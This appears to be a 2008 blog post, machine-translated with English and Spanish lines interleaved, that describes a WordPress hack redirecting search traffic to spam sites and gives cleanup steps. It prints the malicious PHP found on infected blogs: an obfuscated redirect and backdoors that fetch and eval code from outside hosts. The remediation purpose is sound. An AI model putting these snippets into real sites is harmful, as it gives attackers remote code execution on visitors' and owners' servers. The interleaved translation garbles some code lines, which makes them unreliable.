WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites WordPress Hack: Recuperar y Fix Google y de motores de búsqueda o No Cookie Tráfico Redirigido a Su-Needs.info, AnyResults.Net, Golden-Info.net y Otros Sitios ilegales

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. Los hackers se van todos a cortar y aprovechar los blogs de WordPress acogió toda la web, la plantación y la inyección de código malicioso en los códigos de WordPress y la base de datos con el fin de reorientar los visitantes y de visitas de Google y otros motores de búsqueda a sitios de spam, como tu-needs.info , Anyresults.net, de oro-info.net, keymachine.de, beliy.us, seogoogle.us y muchos otros sitios de spam que llena de pago por clic anuncios de CPC. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. Algunos hack parece objetivo más grande multitud de reorientación de todos, sin WordPress cookie. Without been hacked, these traffic supposedly to arrive at the blog as destination. Sin sido hackeado, estos supuestamente tráfico para llegar al blog como destino.

Symptoms of the Search Engine Redirection Hack Los síntomas del motor de búsqueda reorientación Hack

Note that not all symptoms may happen altogether. Tenga en cuenta que no todos los síntomas pueden ocurrir por completo. There may be more than one method of hacks existed, which contributed to different finding and possible resolution. Puede haber más de un método de hacks existía, lo que contribuyó a encontrar diferentes y la posible solución.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. Cualquier clic a través de los motores de búsqueda como Google, Yahoo, AOL, MSN, Windows Live resultados de búsqueda, incluido el nombre del blog, será redirigida y dirigido a los sitios de hackers como de su needs.info, anyresults.net, de oro-info . netos, keymachine.de, beliy.us, seogoogle.us, con la lista asegúrese de crecer. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine. Visor llega a la página del hacker con la misma cadena de búsqueda que él o ella utiliza para buscar en los motores de búsqueda.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too. Haga clic en un enlace para el blog en lector de feeds RSS, como Google Reader puede ser redireccionado a sitios de hackers.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites. Un usuario no cuenta con en el blog, o no login (por lo tanto, no se ha detectado cookie de código malicioso), será redireccionado a sitios de spam.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem. Sólo las visitas de los motores de búsqueda se han reorientado de distancia, y el truco para engañar a gestionar probablemente en torno a una gran cantidad de bloggers, webmasters y propietarios de sitios web, o al menos retrasar la detección del problema.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact. Súbita enorme y dramática caída y la pérdida de enorme cantidad de visitantes de tráfico y visitas a páginas web tracker en las estadísticas, especialmente el tráfico con Google como referencia, a pesar de resultados del motor de búsqueda ranking está intacta.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. Massic caída de los ingresos publicitarios de Google AdSense u otra red de anuncios, comisiones o de sus afiliados.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: La siguiente codificación base64 código PHP puede aparecer en el wp-blog-header.php disposición:

  <?php \ <? PHP \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ seref = array ( "google", "msn", "vivir", "altavista", "pedir", "yahoo", "AOL", "cnn", "tiempo", "Alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; } $ ser = 0; foreach ($ seref como $ ref) if (strpos (strtolower ($ _SERVER [ 'HTTP_REFERER']),$ ref)! == false) ($ ser = "1?; break;)
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> if ($ ser == "1? & & sizeof ($ _COOKIE) == 0) (header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ =")."/"); salida;)?>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. Una imagen, que es en realidad un montón de código malicioso de PHP, se añadió a la wp-contents/uploads directorio. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg. Por ejemplo, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, o puede ser tema dentro de su carpeta, es decir, wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg. El nombre de la imagen puede estar en el formato de xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. Las entradas se insertó en la base de datos MySQL para WordPress wp_options para activar la imagen (el malicioso código PHP) como un plugin, por lo general como rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Puede haber también códigos maliciosos, en especial los que interpretarse con eval () o base64_decode () comando se inserta en otros archivos PHP de WordPress. Examples are the following codes: Ejemplos de ello son los siguientes códigos:

  if(isset($_GET['p'])) { if (isset ($ _GET [ 'p'])) (
$sock = @fsockopen(’km20725.keymachine.de’, 80); $ calcetín = @ fsockopen ( 'km20725.keymachine.de', 80);
if($sock){ if ($ calcetín) (
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”); fwrite ($ calcetín, 'GET http://km20725.keymachine.de/server/index.php?host ='.$_ SERVER [' SERVER_NAME'].'& p ='.$_ GET [ 'p'] '. HTTP / 1,0 "." \ R \ n ");
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”); fwrite ($ calcetín, 'Anfitrión: km20725.keymachine.de'. "\ r \ n \ r \ n");
while($content[] = fgets ($sock)); while ($ contenido [] = automáticamente fgets ($ calcetín));
$content = implode(”, $content); $ contenido = implosión ( ", $ contenido);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”)))); @ eval (trim (substr ($ contenido, strpos ($ contenido, "\ r \ n \ r \ n "))));
fclose ($sock);} fclose ($ calcetín);)
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://beliy.us/server/index.php?host ='.$_ SERVER [' SERVER_NAME'].'& p = ». $ _GET [ 'P']));
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://seogoogle.us/server/index.php?host ='.$_ SERVER [' SERVER_NAME'].'& p = ». $ _GET [ 'P']));
} )

  eval(gzinflate(base64_decode( eval (gzinflate (base64_decode (

• WordPress theme that is been activated and used can be injected with hacking code and affected too. WordPress tema que se ha activado y se utilizan pueden ser inyectados con la piratería y el código afectado demasiado. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below Este código normalmente existe en header.php index.php o del tema, y tiene una línea similar a la de abajo

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some La búsqueda de WordPress para redirigir el tráfico de spam sitio hack sucede probablemente debido al agujero de seguridad y vulnerabilidad que no es parcheado cuando el propietario del blog no decide actualizar a la última versión de WordPress (aunque algunos reports informes that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). que sus blogs se cortó a pesar de que ya se encuentra en la última versión 2.5.1 de WordPress). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages. Cualquiera que sea la causa, aquí está la solución y la solución para resolver la derrota y el hack para asegurar que eres el propietario de la parte posterior del tráfico y evitar sido penalizado por Google por irrazonable volver a dirigir a las páginas de spam.

1. Backup the WordPress database. Copia de seguridad de la base de datos de WordPress.
2. Use phpMyAdmin to browse WordPress MySQL database tables. El uso phpMyAdmin a navegar por WordPress tablas de base de datos MySQL. Go to wp_options table, and then edit the row named active_plugins . Ir a wp_options mesa, y luego editar el nombre active_plugins fila. The row details all active plugins that has been activated. La fila activa de todos los detalles plugins que se ha activado. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Ir a través de la lista (en una línea), y buscar a un un plugin llamado terminó con una imagen de extensión, como. Jpg,. Jpeg,. Gif, etc Por ejemplo, abcdefgh_old.jpeg. Note down the path to the image file. Anote la ruta al archivo de imagen.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file. El uso de sFTP o SSH (olvídate de FTP o Telnet para la seguridad), a continuación, navegar a la ruta del archivo, y elimine el archivo.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. Ir al Administrador de WordPress Plugins panel, activar o desactivar cualquier plugin para quitar el plugin malicioso de la "active_plugins" fila.
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : Volver a phpMyAdmin, en la tabla wp_options, encontrar una fila que contiene la siguiente cadena como option_name:

   rss_f541b3abd05e7962fcab37737f40fad8 rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away. Eliminar la fila de distancia.

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial: Si no sabe cómo realizar la limpieza detallada base de datos en pasos anteriores, aquí el vídeo tutorial:

6. Go to wp_users table. Ir a la tabla wp_users. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number). Si hay un nombre de usuario (valor nulo en user_nicename campo), creado en 00:00:00 en 0000-00-00, anotar el identificador de usuario (ID campo, un número). Delete the user. Eliminar el usuario.
7. Browse the wp_usermeta table. Navegar wp_usermeta la mesa. Locate all rows with user_id matches the ID of the deleted illegal user. Localizar todos los registros con user_id coincide con el ID del usuario suprimido ilegal. There are normally three rows been associated to the invader user ID. Hay normalmente tres filas sido asociada a la identificación de usuario invasor. Delete all the associated rows. Eliminar todas las filas asociadas.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Acceso al servidor para editar el tema de archivos, o navegar por el tema de los archivos de "código en el Editor de Tema de WordPress Administrador del panel de diseño. Check the header.php and index.php for any suspicious code. Compruebe la header.php index.php y para cualquier código sospechoso. As mentioned above, look for something similar to the line below: Como se mencionó anteriormente, para ver algo similar a la línea siguiente:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

   If found, delete and remove the code. Si la encuentra, suprimir y eliminar el código. Note that the malicious code will be several lines long in total. Tenga en cuenta que el código malicioso se varias líneas de largo en total.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. Si no es ya existían, crear un vacío archivo index.html en el directorio wp-contents/plugins. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. El blanco index.html esconde el contenido del directorio de plugins, lo que efectivamente escudo plug-ins sido utilizado de hackers para endurecer y reforzar la seguridad de WordPress.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original Subir y sustituir todos y cada uno de los archivos de WordPress (no sólo el wp-blog-header.php) en el servidor con la fresca, limpia y original latest version from WordPress última versión de WordPress (of course, except few files such as wp-config.php and themes). (por supuesto, con excepción de algunos archivos, como wp-config.php y temas). If you’re upgrading, read the Si va a actualizar, leer la guide guía carefully. cuidadosamente.
11. Change your password. Cambie su contraseña.
12. If you have multiple users, change theirs password (or ask them to change the password) too. Si tiene varios usuarios, cambiar la contraseña de ellos (o pedirle que cambie la contraseña).

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. IMPORTANTE: Se trata de una máquina que traduzca la página se proporciona "tal cual" sin garantía. Machine translation may be difficult to understand. La traducción automática puede resultar difícil de entender. Please refer to Por favor, consulte original English article artículo original Inglés whenever possible. siempre que sea posible.

Share and contribute or get technical support and help at Compartir y contribuir o recibir apoyo técnico y ayudar a My Digital Life Forums Mi vida digital Foros .

Related Articles Artículos relacionados

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank Añadir nofollow relación con WordPress blogroll para aumentar PageRank
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin WordPress Plugin: Pantalla de Google Analytics y FeedBurner las estadísticas de los informes del administrador del sitio
• Technorati Incoming Links Plugin for WordPress Próximos enlaces Technorati plugin para WordPress
• A Glance At Google Merchant Search Un vistazo a Google Búsqueda de comerciante
• How to Avoid, Bypass or Escape Google Sandbox Cómo evitar, eludir o Escape Google Sandbox
• Ask.com Search Engine Review by CNNMoney Ask.com motor de búsqueda de Examen de CNNMoney
• Drive More Traffic by Using Images Cómo atraer más tráfico mediante el uso de imágenes
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder SEO Friendly reescribir método para mover la URL del sitio web de subdirectorio a raíz carpeta
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template Integrar y mostrar AdSense de Google para la búsqueda y el Co-op costumbre resultados del motor de búsqueda en blog de WordPress plantilla de página
• Which Search Engine is the Best and Most Relevant? Motor de búsqueda que es la mejor y más relevante?

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Esta entrada fue publicada el martes, 10 de junio de 2008 a 1:03 horas y se presenta bajo Weblogs Weblogs . . You can follow any responses to this entry through the Puedes seguir cualquier respuesta a esta entrada a través de la RSS 2.0 RSS 2,0 feed. alimentar. You can Puede leave a response salir de una respuesta , or , O trackback trackback from your own site. desde su propio sitio.